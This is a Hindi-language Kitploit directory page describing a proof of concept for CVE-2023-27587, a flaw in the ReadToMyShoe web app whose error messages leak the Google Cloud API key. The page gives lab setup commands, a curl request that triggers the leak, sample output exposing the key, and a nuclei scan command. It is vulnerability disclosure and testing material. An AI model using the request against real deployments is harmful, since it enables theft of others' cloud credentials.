Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-27587-PoC — The simple PoC of CVE-2023-27587 | Kitploit
उपकरण/GitHubGitHub/vagnerd/cve-2023-27587-poc
Vulnerability AnalysisExploitationInformation GatheringWeb SecuritySecret DetectionAPI Security
GitHubvagnerd/cve-2023-27587-poc

CVE-2023-27587-PoC

The simple PoC of CVE-2023-27587

रिपॉजिटरी देखें
513 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-27587-PoC

CVE-2023-27587 का सरल PoC

ReadToMyShoe क्या है?

ReadtoMyShoe (RTMS) एक वेब एप्लिकेशन (rust, yew और axum) है जो आपको लेख अपलोड करने (URL के माध्यम से या सीधे पेस्ट करके) और बाद में उन्हें सुनने की अनुमति देता है।

प्रभाव

यदि लेख जोड़ते समय कोई त्रुटि होती है, तो वेबसाइट उपयोगकर्ता को एक त्रुटि संदेश दिखाती है। यदि त्रुटि Google Cloud TTS अनुरोध से उत्पन्न होती है, तो इसमें अनुरोध का पूरा URL शामिल होगा। अनुरोध URL में Google Cloud API कुंजी होती है।

PoC

संवेदनशील ReadtoMyShoe सेटअप करें

root@kitploit:~
$ git clone https://github.com/rozbb/readtomyshoe.git
$ cd readtomyshoe && git checkout v0.2.0
$ echo "GCP_KEY_LEAKED_TEST" > server/gcp_api.key
$ DOCKER_BUILDKIT=1 docker build -t readtomyshoe-vul .
$ docker run -p 9382:9382 readtomyshoe-vul

शोषण

कुंजी केवल तब उजागर होती है जब GPC कॉल में त्रुटि होती है!

root@kitploit:~
curl 'http://192.168.15.201:9382/api/add-article-by-text' -X POST \
  -H 'Accept-Encoding: gzip, deflate' \
  -H 'content-type: application/json' \
  --data-raw '{"title":"Kernsicherheitstest","body":"Kernsicherheitstest"}'

प्रतिक्रिया त्रुटि (उजागर API कुंजी):

root@kitploit:~
TTS failed: TTS request failed

Caused by:
    HTTP status client error (400 Bad Request) for url (https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=GCP_KEY_LEAKED_TEST%0A)

2023-03-15 13-03-59 का स्क्रीनशॉट

nuclei-template

https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-27587.yaml

root@kitploit:~
$ nuclei -t cves/2023/CVE-2023-27587.yaml -u http://<host>

2023-03-15 13-22-23 का स्क्रीनशॉट

संदर्भ

https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587

https://beta.readtomyshoe.com/

टूल डाउनलोड करें